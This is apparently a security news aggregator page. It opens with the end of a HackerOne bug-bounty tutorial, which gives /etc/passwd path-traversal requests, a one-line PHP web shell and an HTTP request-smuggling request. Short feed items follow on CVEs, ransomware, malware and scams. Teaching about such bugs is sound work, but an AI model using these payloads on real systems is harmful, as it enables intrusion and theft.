restrictions in place, you may be able to access, modify, or execute arbitrary files. This can be especially impactful when access to files and directories outside of the web root is possible, as these directories contain sensitive system files.For example, if an application selects an image file to use as the banner of a webpage, you could use directory traversal techniques to access other files:GET /image?filename=../../../etc/passwdEven if security checks are implemented, such as ensuring that the filename ends in an image extension, it may be possible to terminate the file path by using a null byte:GET /image?filename=../../../etc/passwd%00.jpgIf traversal sequences are being matched and removed, the same embedding technique mentioned earlier may bypass this sanitization:GET /image?filename=....//....//....//etc/passwdIf the web application offers file upload functionality, the presence of this insecure design capability can result in the ability to upload malicious files. For example, if a server was using PHP as its backend language, you could potentially achieve remote code execution by uploading your own PHP file with the following script:<?php echo system($_GET[''command'']); ?>By navigating to the uploaded file''s location and supplying the command parameter, you could run system commands on the server:GET /uploads/command.php?command=whoamiCWE-444: Inconsistent Interpretation of HTTP RequestsCertain insecure design vulnerabilities in a system''s architecture can be exploited via HTTP request smuggling attacks.For web applications that are not well known and thus receive low levels of traffic, a single server is most likely sufficient enough to handle all the incoming requests. However, popular applications can receive levels of traffic that would overwhelm a solo server – resulting in latency issues or outages. To mitigate against system downtime, network engineers may place servers (load balancers or reverse proxies) in front of backend servers to alleviate the workload. These frontend servers will intercept multiple requests, group them, and distribute the bundled requests in a way that ensures no one backend server is overwhelmed. Each request in this bundle will enter a processing queue.To delineate these bundled requests, HTTP/1.1 utilizes two request headers to specify where one request ends, and another begins: Content-Length and Transfer-Encoding.The value of the Content-Length header is representative of the number of bytes in the body of a request. For example:POST /comment HTTP/1.1Host: example.comContent-Length: 28Content-Type: application/x-www-form-urlencodedcomment=X&username=ninjeeterIf the value of the Transfer-Encoding header is set to chunked, the request body data is divided into one or more portions referred to as ""chunks"". The data is also measured in bytes but is represented in hexadecimal encoding. With this header, the end of a request is marked with a chunk size of 0. For example:POST /comment HTTP/1.1Host: example.comTransfer-Encoding: chunkedContent-Type: application/x-www-form-urlencoded 1ccomment=X&username=ninjeeter0The vulnerability arises when there is a mismatch between the frontend and backend server on which the header is to be used. By sending a request with both headers, the frontend is tricked into thinking multiple requests are a single request. However, once the backend receives this ""single"" request, it processes each one separately.For example, if the frontend server uses the value of the Content-Length header to determine the end of a request, but the backend uses Transfer-Encoding: chunked – you could potentially ""smuggle"" a request to a restricted endpoint with:POST /comment HTTP/1.1Host: example.comCookie: session=123ABCContent-Length: 138Content-Type: application/x-www-form-urlencodedTransfer-Encoding: chunked 0GET /admin/delete?name=otheruser HTTP/1.1Host: localhostContent-Type: application/x-www-form-urlencodedContent-Length: 51x=This request will be seen as one by the frontend but as two by the backend. When the backend gets to the GET /admin/delete?name=otheruser HTTP/1.1 request, it will be held in the processing queue awaiting the missing 49 bytes. The empty parameter x= will catch the subsequent request and take the first 49 bytes from it.It is critical to note that the value of Content-Length header includes the CRLF characters. Each \r and \n is considered to be one byte: Here are some disclosed HTTP request smuggling reports that have been submitted by security researchers on the HackerOne platform:https://hackerone.com/reports/2032842https://hackerone.com/reports/726773https://hackerone.com/reports/1063627https://hackerone.com/reports/777651CWE-840: Business Logic ErrorsBusiness logic vulnerabilities allow malicious attackers to exploit an application''s legitimate processing flow to achieve unintended results. These issues arise from unforeseen user behavior and design choices based on assumptions made by developers that do not account for edge cases.In processing flows that are multistep, developers may not envision scenarios in which certain parameters are removed, reused, or modified. These parameters can be critical to the proper outcome of an operation. Data flows that should be tested for business logic vulnerabilities include:Password reset functionalityAuthentication flowsUpdating account informationE-commerce purchase flowsApplying discount codesCertain crucial parameters may even be inherently insecure as their values are widely known. For example, if developers require a security question to be answered before allowing a password reset, but the question is too general, such as: ""What city did you grow up in?"" – you could simply use this wordlist to brute force the correct answer.Since these vulnerabilities arise in the specific context of the functionality a web application offers, these insecure design weaknesses can go undetected without in-depth code review. When you are navigating an application, make sure you become familiar with the intended flow of user actions, and then you can brainstorm how the process can be exploited.ConclusionInsecure design vulnerabilities are often tied to the specific technologies powering an application. Because of this, it is crucial to first identify and understand the technologies in use before looking for potential weaknesses. This can be accomplished by using tools such as WhatRuns or Wappalyzer. It is also important to gain a deep understanding of how the application operates, so invest ample time into a single target. Ultimately, securing an application from the ground up requires careful attention to detail, and any oversight can result in a bounty payout for you. Excerpt Learn about the different types of insecure design vulnerabilities and how to identify them. Main Image

by HackerOne

Morphisec highlights the evolution of fake update campaigns and the emergence of CoinLurker—a powerful information stealer written in Go. CoinLurker uses advanced evasion techniques, including in-memory execution, multi-stage obfuscation, and reliance on trusted platforms, making it a formidable threat to individuals and organizations. Fake Update campaigns and delivery tactics CoinLurker builds on the deceptive strategies … The post New Infostealer Malware CoinLurker Used in ‘Fake Update’ Campaigns appeared first on CyberInsider.

by Cyber Insider

by KnowBe4

With generative artificial intelligence (gen AI) on the frontlines of information security, red teams play an essential role in identifying vulnerabilities that others can overlook. With the average cost of a data breach reaching an all-time high of $4.88 million in 2024, businesses need to know exactly where their vulnerabilities lie. Given the remarkable pace […] The post Testing the limits of generative AI: How red teaming exposes vulnerabilities in AI models appeared first on Security Intelligence.

by Security Intelligence

Overview On December 16, 2024, the Indian Computer Emergency Response Team (CERT-In) issued a vulnerability note (CIVN-2024-0356) regarding multiple security flaws in Google Chrome for Desktop. These vulnerabilities, rated HIGH in severity, could allow remote attackers to execute malicious code or disrupt the system’s functionality through a Denial of Service (DoS) attack. Affected Software Versions These vulnerabilities impact the following versions of Google Chrome for Desktop: Windows and macOS: Versions prior to 131.0.6778.139/.140 and 131.0.6778.108/.109. Linux: Versions prior to 131.0.6778.139 and 131.0.6778.108. All end-user organizations and individuals using Google Chrome for Desktop are urged to update their browsers immediately to prevent potential exploits. Impact of the Vulnerabilities The identified vulnerabilities can lead to the following risks: Remote Code Execution: A remote attacker could execute arbitrary code on a target system using a maliciously crafted webpage. Denial of Service (DoS): Attackers can crash the browser or make it unresponsive, causing system instability. Sensitive Information Disclosure: Exploitation may allow access to sensitive information stored in the browser. Detailed Description of the Vulnerabilities Google Chrome, a widely-used web browser across Windows, macOS, and Linux systems, is vulnerable to specific flaws caused by improper handling of memory during certain operations. Below is a breakdown of the vulnerabilities: 1. CVE-2024-12381: Type Confusion in V8 Severity: High Description: The V8 JavaScript engine, used by Google Chrome to process web content, has a Type Confusion issue. Type Confusion occurs when the browser misinterprets the type of an object, leading to unexpected behavior. This flaw can result in heap corruption when a specially crafted HTML page is executed. Reported by: Seunghyun Lee (@0x10n) on December 2, 2024. Affected Versions: Google Chrome prior to version 131.0.6778.139/.140. 2. CVE-2024-12382: Use After Free in Translate Severity: High Description: A Use After Free vulnerability exists in Google Chrome’s Translate component. Use After Free occurs when memory is accessed after it has been freed, leading to unexpected behavior or crashes. Exploiting this vulnerability via a crafted HTML page can cause heap corruption or allow remote code execution. Reported by: lime (@limeSec_) from TIANGONG Team of Legendsec at QI-ANXIN Group on November 18, 2024. Affected Versions: Google Chrome prior to version 131.0.6778.139/.140. 3. CVE-2024-12053: Type Confusion in V8 Severity: High Description: Another Type Confusion vulnerability in the V8 engine impacts earlier versions of Google Chrome. Exploitation through a malicious HTML page can result in object corruption, potentially leading to system compromise. Reported by: gal1ium and chluo on November 14, 2024. Affected Versions: Google Chrome prior to version 131.0.6778.108/.109. How Can These Vulnerabilities Be Exploited? Attackers can take advantage of these vulnerabilities by luring users to visit a specially crafted webpage. Once the webpage is loaded, it can trigger the security flaws, allowing the attacker to: Execute malicious code remotely on the target system. Corrupt memory, causing the browser to crash. Steal sensitive data or compromise system functionality. Given the widespread use of Google Chrome, it is critical to address these vulnerabilities immediately. Solution: Update Google Chrome Immediately Google has addressed these vulnerabilities by releasing updated versions of Chrome for Desktop on the Stable Channel. The updates are being rolled out gradually, and all users are advised to apply them as soon as possible. Updated Versions Windows and macOS: Version 131.0.6778.139/.140 Linux: Version 131.0.6778.139 To update Google Chrome: Open Google Chrome. Click on the three dots (Menu) in the top-right corner. Navigate to Help > About Google Chrome. Chrome will automatically check for updates and install the latest version. Restart the browser to apply the update. Security Fixes and Acknowledgements Google has credited several external security researchers for identifying and reporting these vulnerabilities: CVE-2024-12381: Seunghyun Lee (@0x10n) – Awarded $55,000 for discovering the issue. CVE-2024-12382: lime (@limeSec_) from TIANGONG Team of Legendsec at QI-ANXIN Group. CVE-2024-12053: gal1ium and chluo – Awarded $8,000 for identifying the flaw. In addition to contributions from external researchers, Google’s internal security teams continue to conduct audits, fuzzing, and other security initiatives to proactively identify and fix vulnerabilities. Why Prompt Updates Are Crucial Rapid Threat Exploitation: Attackers often exploit known vulnerabilities within days of disclosure. Delaying updates leaves systems vulnerable. Prevention of Data Breaches: Remote code execution could allow attackers to access sensitive data, including saved passwords and browsing history. System Stability: Updating ensures that your browser runs smoothly without crashes caused by these vulnerabilities. Best Practices for Safe Browsing In addition to updating Google Chrome, here are some best practices to stay secure: Enable Automatic Updates: Keep your browser and software up-to-date. Use Security Extensions: Install reliable security extensions to block malicious content. Avoid Suspicious Links: Do not click on unknown or untrusted links in emails or messages. Enable Site Isolation: Chrome’s Site Isolation feature helps contain exploits. Regular Security Scans: Use antivirus software to detect and prevent malicious activity. Check Permissions: Regularly review website permissions (e.g., camera, microphone) to limit exposure. Conclusion The multiple vulnerabilities identified in Google Chrome highlight the importance of timely software updates to ensure system security and stability. The flaws—primarily Type Confusion in V8 and Use After Free in Translate—can be exploited by attackers to execute arbitrary code, cause system crashes, or steal sensitive data. All users of Google Chrome for Desktop are urged to update their browsers to the latest stable version (131.0.6778.139/.140) without delay. By applying updates and following safe browsing practices, users can significantly reduce the risk of cyberattacks and ensure a secure online experience. At Cyble, we remain committed to helping organizations stay ahead of evolving cyber threats through continuous threat monitoring and actionable intelligence. Stay informed, stay secure. Schedule a demo today to see how Cyble can safeguard your systems against emerging vulnerabilities and cyber threats. Source: https://www.cert-in.org.in/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12382 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12053 https://chromereleases.googleblog.com/2024/12/stable-channel-update-for-desktop_10.html https://chromereleases.googleblog.com/2024/12/stable-channel-update-for-desktop.html https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12381 The post Multiple Vulnerabilities in Google Chrome for Desktop: Update to Stay Secure appeared first on Cyble.

by CYBLE

This is a walkthrough of a Linux fundamentals Section in HTB Academy. It is recommended that you do the module in HTB Academy to…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

If you don’t have medium membership, you can access the blog here: https://viscid.substack.com/p/picoctf-2024-webdecode-3801d825f803Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

If you don’t have medium membership, you can access the blog here: https://viscid.substack.com/p/advent-of-cyber-2024-day-2-soc-analystsContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

If you don’t have a medium membership, you can access the blog here…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

If you don’t have a medium membership, you can access the blog here…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

If you don’t have a medium membership, you can access the blog here…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Dive into the ultimate guide for automotive penetration testing. Discover the critical steps and measures to enhance vehicular…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Even if we’re horribly mismanaged, there’ll be no sad faces on SOC-mas!Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

It came without buffering! It came without lag!Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

It came without buffering! It came without lag!Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

The university''s incident website blocks search engines from listing the site, making it more difficult for affected individuals to find the website in search results. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

From cyber attacks across the geopolitical landscapes, to product updates that help small businesses, Sophos was there in 2024.

by Sophos News

A little-known cyber espionage actor known as The Mask has been linked to a new set of attacks targeting an unnamed organization in Latin America twice in 2019 and 2022. ""The Mask APT is a legendary threat actor that has been performing highly sophisticated attacks since at least 2007,"" Kaspersky researchers Georgy Kucherin and Marc Rivero said in an analysis published last week. ""Their targets

by The Hacker News

The marketing of illegal drugs on open platforms is “gaining prominence,” authorities note, while the number of drug transactions on the dark web has decreased in recent years.

by WIRED Security News

Experts say the catchall term for online fraud furthers harm against victims and could dissuade people from reporting attempts to bilk them out of their money.

by WIRED Security News

We''re sharing top 5 cryptographic key protection best practices. The post Top 5 Cryptographic Key Protection Best Practices appeared first on Zimperium.

by Zimperium

by ComputerWeekly

Broadcom''s shares have skyrocketed 38% post-earnings, fueled by AI market optimism. However, sustaining this trajectory hinges on delivering on ambitious growth projections.

by ITPro Today

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added two security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The list of flaws is below - CVE-2024-20767 (CVSS score: 7.4) - Adobe ColdFusion contains an improper access control vulnerability that could allow an attacker to access or modify restricted

by The Hacker News

Prioritizing a security-first approach and robust data governance can help organizations harness AI''s potential while safeguarding sensitive information.

by ITPro Today

SandboxAQ, a leading technology company, has achieved significant milestones in cybersecurity research and development. The company’s dedicated team has made substantial contributions to the field, particularly in post-quantum cryptography (PQC). In 2024 alone, SandboxAQ has published 18 peer-reviewed papers, bringing the total number of cybersecurity publications since its spin-off from Alphabet in 2022 to 45. […] The post SandboxAQ Advances Global Cybersecurity Through Series of Milestones appeared first on IT Security Guru.

by IT Security Guru

Cybercriminals are exploiting Microsoft Teams to deceive users into installing remote access tools, granting attackers control over victims'' systems. The post Hackers exploiting Microsoft Teams to gain remote access to user’s system appeared first on ZENDATA Cybersecurity.

by Zendata

A PagerDuty study finds that 88% of global executives anticipate major IT disruptions in 2025, highlighting widespread concerns about operational resilience.

by ITPro Today

The proposed legislation comes amid a surge in ransomware and state-linked attacks against U.S. water utilities.

by Cybersecurity Dive

As another year comes to an end, it’s not only Santa who brings presents for those on his nice list. These days, it’s quite common for well-known firms to publish their annual roundups of the most notable events that have taken place in the cybersecurity landscape, together with predictions of what can we expect in […] The post Top three cyber threats that will persist in 2025 appeared first on Outpost24.

by Outpost24

by ComputerWeekly

by ComputerWeekly

The federal agency’s efforts to improve defenses surged in fiscal year 2024. Yet, attacks continue to climb.

by Cybersecurity Dive

Mamont banker is distributed under the guise of an application for tracking the delivery of goods offered at wholesale prices.

by Kaspersky

2024 was a difficult year for healthcare cybersecurity, but there are some hopeful signs heading into 2025, with effective controls and new rules coming. According to the healthcare cybersecurity trends of 2024, healthcare cyber defenses came under attack like never before, with headline-grabbing ransomware and other cyberattacks endangering patient safety and privacy alike.  Change Healthcare, Ascension and NHS London were some of the biggest victims in 2024, but hundreds of smaller healthcare organizations suffered too, and there were likely additional attacks that were never confirmed.  Governments and private organizations alike struggled to find solutions, and while there was some progress to cheer, the data on healthcare cybersecurity continues to paint a challenging picture for the critical sector.  Your browser does not support the video tag. We’ll look at the year in healthcare cybersecurity – including some good news – and what may be in store for 2025.  Ransomware Attacks on Hospitals in 2024: A Global Trend  A little more than four years ago, ransomware groups pledged that they wouldn’t attack healthcare infrastructure during the COVID-19 pandemic.  How times have changed. 2024 saw an increase both in the number and severity of healthcare ransomware attacks, with some attacks limiting patient care for weeks and resulting in huge cleanup costs.  Here are some of the year’s biggest healthcare cyberattacks.  Change Healthcare set the tone for the year in February, with a ransomware attack that resulted in the theft of the insurance and healthcare records of more than 100 million Americans. The breach, attributed to lack of multifactor authentication (MFA) on a legacy server, may eventually cost parent company UnitedHealth Group nearly $3 billion and pushed cybersecurity onto the pages of the prestigious Journal of the American Medical Association (JAMA). Change Healthcare made at least one ransom payment after the attack, which didn’t prevent the data from being leaked while simultaneously increasing the attractiveness of the healthcare sector as a target for cybercriminals.  Also in February, the Cencora data breach affected more than a dozen pharmaceutical companies, including Johnson and Johnson.  Ascension Healthcare was another major target, hit by a ransomware attack in May that led to chaos and disruption at some of the 140 hospitals the company oversees. The breach demonstrated how dangerous ransomware attacks on hospitals in 2024 can be, as it reportedly led to lapses in patient care.  In June, NHS London hospitals became a case study in how healthcare systems may be ill-prepared to carry out backup processes that a ransomware attack can impose, as an attack on lab services provider Synnovis resulted in a 96% drop in blood tests.  Plenty of smaller healthcare cyberattacks were just as disruptive to the communities they serve. One of the most alarming incidents was a ransomware attack that caused patients to be diverted from the University Medical Center (UMC) Health System in Lubbock, Texas – the only Level 1 trauma center within 400 miles.  Other healthcare cyberattacks that posed dire threats for patient care or privacy included the non-profit blood center OneBlood, Boston Children’s Health Physicians, and Planned Parenthood.  U.S. Leads in Healthcare Ransomware Attacks  The U.S. remains the biggest target for cyberattacks in general, and healthcare is no exception. Of 339 healthcare ransomware attacks recorded by Cyble threat intelligence researchers as of early December, 251 hit U.S. organizations.  Globally, ransomware attacks on healthcare organizations were up 27% in the first 11 months of 2024 compared to the same period of 2023. An additional 62 attacks targeting the pharmaceutical and biotech sector have pushed the total number of global healthcare-related ransomware attacks above 400 with a few weeks left in the year.  Or put another way, healthcare ransomware attacks have occurred at a rate of more than one a day in 2024.  Ransomware attacks on U.S. healthcare organizations have been up 36% this year, but one of the overlooked aspects of these attacks are the medical device security challenges that make the healthcare sector an even more attractive target for cybercriminals.  But the big “winner,” if you will, has been the UK, which saw just two healthcare ransomware attacks in 2023 and has already been hit 16 times this year, an increase of 700%.  Canada, Germany and Australia round out the top five (image below).  LockBit was the top ransomware group hitting the healthcare sector in 2024, but the group’s activity has declined amid enforcement actions, and RansomHub may take over the top spot by year’s end. INC, BianLian and Everest round out the top five (image below).  Overall, healthcare was the third most-frequently targeted sector by ransomware groups of more than 20 sectors tracked by Cyble, with professional services and construction the only sectors experiencing more ransomware attacks.  Healthcare Cybersecurity Breaches on the Dark Web  Another data point showing a dramatic increase in healthcare cybersecurity incidents can be found in the data and credentials for sale on the dark web.  Cyble researchers have documented 181 credible healthcare claims by threat actors and cybercriminals on the dark web, and an additional 36 targeting pharmaceutical and biotech organizations.  That’s already more than 50% higher than the 140 dark web claims documented by Cyble across both sectors in all of 2023.  Healthcare data is particularly valuable for cybercriminals because there is no personally identifiable information (PII) that reveals more than healthcare data, which can include a patient’s medical conditions and diagnoses in addition to other identifying factors.   As healthcare organizations increasingly rely on cloud infrastructure, cloud security in healthcare IT has become an essential focus for securing sensitive data and preventing breaches on these platforms. Dark web monitoring becomes especially important in this context, as cloud environments can be a prime target for cybercriminals seeking to exploit vulnerabilities.   Dark web monitoring is an important practice for healthcare firms to adopt, as they can detect data leaks faster, and – equally important – also detect when credentials like usernames and passwords leak onto the dark web, which is the most common initial attack vector in breaches, according to IBM-Ponemon.  Good News: Cost of a Healthcare Data Breach Drops  One bit of good news is the annual IBM-Ponemon Cost of a Data Breach report found that the average cost of a healthcare data breach dropped by more than $1 million this year, from $10.93 million to $9.77 million per incident. However, that’s still double the average cost of a data breach, and 60% higher than the second-place financial services sector, as healthcare’s unique cybersecurity and data protection challenges make incident response and cleanup extremely difficult.  [caption id=""attachment_99573"" align=""aligncenter"" width=""415""] Image: IBM-Ponemon Cost of a Data Breach by sector[/caption] The good news in that data is that healthcare cybersecurity may actually be improving. The report also found that AI and automation technologies in particular had a pronounced benefit, with the most sophisticated users across all sectors saving an average of $2.2 million per breach.  Other positive factors include initial detection by internal tools and teams (rather than hearing from third parties or attackers), and bringing in law enforcement in ransomware cases saved nearly $1 million per incident.  The security tools that most lowered the cost of breaches were:  Employee training  AI- and machine learning-driven insights  SIEM systems  Incident response planning  Encryption  Threat intelligence  Of those tools, encryption is a particularly relevant one for the healthcare industry, as 98% of medical IoT device traffic is unencrypted.  Medical IoT Devices: Healthcare’s Unique Achilles Heel  A recent Cyble report looked at the unique challenges of medical internet of things (IoT) devices, which is another factor contributing to the sector’s uniquely difficult cybersecurity challenges.  Among the issues plaguing internet of medical things (IoMT) devices are things like:  Device Exposure: Over 50% of hospital IoT devices are vulnerable to attack.  Unpatched Security Flaws in Infusion Pumps: 75% of infusion pumps have unpatched security flaws.  Unsupported Operating Systems in Medical Imaging Systems: 83% of medical imaging systems run on unsupported operating systems.  Unencrypted Network Traffic: 98% of IoMT device network traffic is unencrypted.  Connected Device Breaches: 88% of healthcare organizations experienced at least one data breach in the past two years due to a vulnerability in a connected device.  CISA, the U.S. Cybersecurity and Infrastructure Security Agency, has issued 11 alerts so far this year warning about vulnerabilities in medical industrial control system (ICS) devices.  Users should patch or replace vulnerable devices whenever it’s possible to do so. And to the extent possible, medical devices should not be exposed to the internet and should be firewalled and segmented from other networks.  What Can Be Done to Improve Healthcare Cybersecurity?  In the U.S., the incoming administration of Donald J. Trump is expected to have an anti-regulatory bias, but healthcare cybersecurity may be one area of surprising agreement between Democrats and Republicans.  There have been a number of bipartisan bills introduced to improve healthcare cybersecurity, the most recently introduced just last month. That’s too late for action in the current Congress, but with the 119th Congress set to begin in January, it signals that healthcare cybersecurity may see some movement in the next Congress.  One promising approach to addressing healthcare cybersecurity challenges is the zero trust adoption in healthcare, which could drastically improve the sector’s defenses. Zero trust principles focus on the idea of never trusting, always verifying, and it can be particularly effective in environments where the network perimeter is no longer easily defined, as in healthcare.  Following a recent GAO report that documented a lack of progress by the Department of Health and Human Services (HHS) in ensuring the security of the healthcare sector – and with a soon-to-be-published HHS proposal that would add new cybersecurity requirements to the HIPAA Security Rule – there appears to be promising consensus around the need for better healthcare security standards in the U.S.  With initiatives also underway in the UK, NIS2 in the EU, the Australia Cyber Security Act, and other places, 2025 could become a turning point for the better for critical infrastructure security in general. 

by The Cyber Express

The Mamont banking trojan is spreading under the guise of a parcel-tracking app for fake stores claiming to offer goods at wholesale prices.

by Securelist

by ComputerWeekly

From Oct to early Dec 2024, our customers observed nearly twice as many fake CAPTCHA websites compared to September, likely the result of researchers releasing the templates used for these campaigns.

by ReliaQuest

In 2023, Bishop Fox reengineered Cosmos to give security teams the speed, scale, and flexibility needed to tackle growing attack surface challenges.

by Bishop Fox

by CrowdStrike

<p>At TrustedSec, we are all about leveraging our collective intelligence and knowledge to uplift the cybersecurity community. One of our most popular educational outlets is The Security Blog, where our experts divulge…</p>

by TrustedSec

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Avalanche. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-37373.

by Zero Day Initiative Advisories

This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft PC Manager. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8.

by Zero Day Initiative Advisories

LDAP RCE 😵, worst.fit (@orange_8361 + @_splitline_) Grok AI vulns (@wunderwuzzi23), automating exploits (@FuzzySec + @chompie1337), and more!

by Bad Sector Labs

Vulnerabilities in Microsoft Azure Data Factory''s integration with Apache Airflow can lead to unauthorized access and control over cloud resources. The post Dirty DAG: New Vulnerabilities in Azure Data Factory’s Apache Airflow Integration appeared first on Unit 42.

by Palo Alto Networks - Unit42

Arctic Wolf plans to integrate Cylance''s endpoint detection and response (EDR) technology into its extended detection and response (XDR) platform.

by Dark Reading

In this post we explore integrated cloud email security (ICES), how it works, and why it is a core component of cybersecurity.

by Barracuda

Artificial intelligence capabilities are coming to a desktop near you — with Microsoft 365 Copilot, Google Gemini with Project Jarvis, and Apple Intelligence all arriving (or having arrived). But what are the risks?

by Dark Reading

While low-code/no-code tools can speed up application development, sometimes it''s worth taking a slower approach for a safer product.

by Dark Reading

Cybersecurity researchers have shed light on a previously undocumented aspect associated with ClickFix-style attacks that hinge on taking advantage of a single ad network service as part of a malvertising-driven information stealer campaign dubbed DeceptionAds. ""Entirely reliant on a single ad network for propagation, this campaign showcases the core mechanisms of malvertising — delivering over

by The Hacker News

The hackers stole names, phone numbers, dates of birth and information related to health conditions, treatments and prescriptions. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Security keys are excellent physical security solutions for protecting your online accounts. We tested the best security keys that combine safety, affordability, and convenience.

by ZDNET Security

The sector must prioritize comprehensive data protection strategies to safeguard PII in an aggressive threat environment.

by Dark Reading

A Serbian journalist had his phone first unlocked by a Cellebrite tool and subsequently compromised by a previously undocumented spyware codenamed NoviSpy, according to a new report published by Amnesty International. ""NoviSpy allows for capturing sensitive personal data from a target''s phone after infection and provides the ability to turn on the phone''s microphone or camera remotely,"" the

by The Hacker News

Summary Four major Chinese state-sponsored Advanced Persistent Threat (APT) groups, Volt Typhoon, Salt Typhoon, Flax Typhoon, and Brass Typhoon, are targeting global critical infrastructure and network devices as part of coordinated cyber espionage campaigns. These groups exploit vulnerabilities in network appliances, IoT devices, and software supply chains to maintain persistent access and exfiltrate sensitive data. Their tactics include living-off-the-land...

by RH-ISAC

This past week has been packed with unsettling developments in the world of cybersecurity. From silent but serious attacks on popular business tools to unexpected flaws lurking in everyday devices, there’s a lot that might have flown under your radar. Attackers are adapting old tricks, uncovering new ones, and targeting systems both large and small. Meanwhile, law enforcement has scored wins

by The Hacker News

Task scams are a new type of scams where victims are slowly tricked into paying to get paid for repetitive simple tasks

by Malwarebytes Labs

The most common way of preventing cross-site request forgery attacks is to use an anti-CSRF token, which is a unique value set and then verified by a web app. CSRF is a client-side attack that can be used to perform unintended actions within a user session, including redirecting to a malicious website or stealing session data. Correctly generating and using CSRF tokens is crucial to protect users against CSRF attacks and their consequences. The post How to prevent CSRF attacks by using anti-CSRF tokens appeared first on Invicti.

by Invicti

Whether you want to disguise your IP address to improve your privacy at college or bypass school blocks to access educational resources, these are the best school VPNs.

by ZDNET Security

Explore industry moves and significant changes in the industry for the week of December 16, 2024. Stay updated with the latest industry trends and shifts.

by SecurityWeek

The company''s spyware, dubbed Graphite, is capable of hacking phones and stealing private communications. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

This week on the Lock and Code podcast, we speak with Ron de Jesus about the work of achieving user privacy while balancing company goals.

by Malwarebytes Labs

With the evolution of modern software development, CI/CD pipeline governance has emerged as a critical factor in maintaining both agility and compliance. As we enter the age of artificial intelligence (AI), the importance of robust pipeline governance has only intensified. With that said, we’ll explore the concept of CI/CD pipeline governance and why it''s vital, especially as AI becomes

by The Hacker News

Arctic Wolf has acquired Cylance, BlackBerry’s beleaguered cybersecurity business, for $160 million — a significant discount from the $1.4 billion BlackBerry paid to acquire the startup in 2018. Under the terms of the deal, which is expected to close in BlackBerry’s fiscal Q4, BlackBerry will sell its Cylance assets to Arctic Wolf for $160 million […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Cybersecurity researchers are calling attention to a new kind of investment scam that leverages a combination of social media malvertising, company-branded posts, and artificial intelligence (AI) powered video testimonials featuring famous personalities, ultimately leading to financial and data loss. ""The main goal of the fraudsters is to lead victims to phishing websites and forms that harvest

by The Hacker News

New terminal on the block: Ghostty, Neovim tutorial series, Docker fundamentals for hackers, and the Four Quarters productivity method. Recent buzz includes Meta''s Llama 3.3 70B model launch and critical findings in Android security vulnerabilities.

by Hive Five

by ComputerWeekly

Cybersecurity researchers have discovered a new PHP-based backdoor called Glutton that has been put to use in cyber attacks targeting China, the United States, Cambodia, Pakistan, and South Africa. QiAnXin XLab, which discovered the malicious activity in late April 2024, attributed the previously unknown malware with moderate confidence to the prolific Chinese nation-state group tracked Winnti (

by The Hacker News

Next year, health IT leaders must prioritize areas such as precision medicine, cyber resilience, and health equity in AI, experts say.

by ITPro Today

Security Information and Event Management systems are vital for businesses’ cybersecurity. They collect and analyze security alerts, protecting against threats. Modern cyber threats outpace legacy SIEM systems. This exposes a critical weakness in your digital defenses. These outdated tools struggle to defend against sophisticated cyberattacks. The solution lies in new technologies built for today’s complex […] The post Why It’s Time to Replace Your Legacy SIEM and What to Consider as a Replacement? appeared first on IT Security Guru.

by IT Security Guru

Check Point Software, a global leader in cybersecurity solutions, today announced a leadership transition. Gil Shwed, the company’s founder and current CEO, will assume the role of Executive Chairman. Nadav Zafrir, a seasoned cybersecurity veteran, will step into the CEO position, effective immediately. “Check Point embarks on a new chapter, with my transition into my […] The post Nadav Zafrir Becomes CEO at Check Point Software appeared first on IT Security Guru.

by IT Security Guru

Every day, a renowned hospital serves the needs of over a million patients, delivering not only world-class care but also hope for healthier futures. But behind the scenes, the hospital’s small but mighty security team was feeling the strain. With two hospital campuses, multiple regional centers, and more than 50 care locations, the pressure to […] The post Lessons From the Field: How a Hospital Turned Cyber Challenges Into a Success Story  appeared first on Binary Defense.

by Binary Defense

Internationalization and localization require more than translation: tone, images, date/time and number formatting, among other items, need to be considered.

by Cloudflare

by ComputerWeekly

Explore the integration of Large Language Models (LLMs) in critical systems and the balance between security and usability with a new LLM benchmarking framework. The post Balancing Security and Usability of Large Language Models: An LLM Benchmarking Framework appeared first on NetSPI.

by NetSPI

New York Releases AI Cybersecurity Guidance: What You Need to Know Ilona Cohen Mon, 12/16/2024 - 10:33 Body AI adoption is accelerating in the financial services industry, both as an asset for improving business operations and as a potential tool to defend against cybercriminals. At the same time, adopting AI systems expands the attack surface that financial institutions must protect. Within this context, the NYDFS guidelines highlight the need for proactive risk management strategies that encompass the unique challenges posed by AI technologies.Cybersecurity Risks of AIThe NYDFS guidance outlines several key cybersecurity risks associated with AI, along with strategies for mitigating those risks:AI-Enabled Social Engineering: One of the most immediate concerns is AI’s potential to enhance social engineering attacks. With tools like deepfakes—AI-generated media that can mimic real people—attackers can create highly convincing phishing schemes. These attacks may occur via emails, phone calls (vishing), SMS (smishing), or even video conferencing, where the attacker impersonates trusted employees or executives.AI-Enhanced Cybersecurity Attacks: AI allows cybercriminals to amplify the potency, scale, and speed of their attacks. With AI, attackers can quickly scan and analyze vast amounts of data, identify and exploit vulnerabilities, deploy malware, steal sensitive information more efficiently, and develop new malware variants or ransomware designed to evade detection.Exposure or Theft of NPI: Financial institutions increasingly rely on AI to process sensitive data, including personally identifiable information (PII) and financial records. This growing reliance heightens the risk of exposure or theft of non-public information (NPI), which is protected 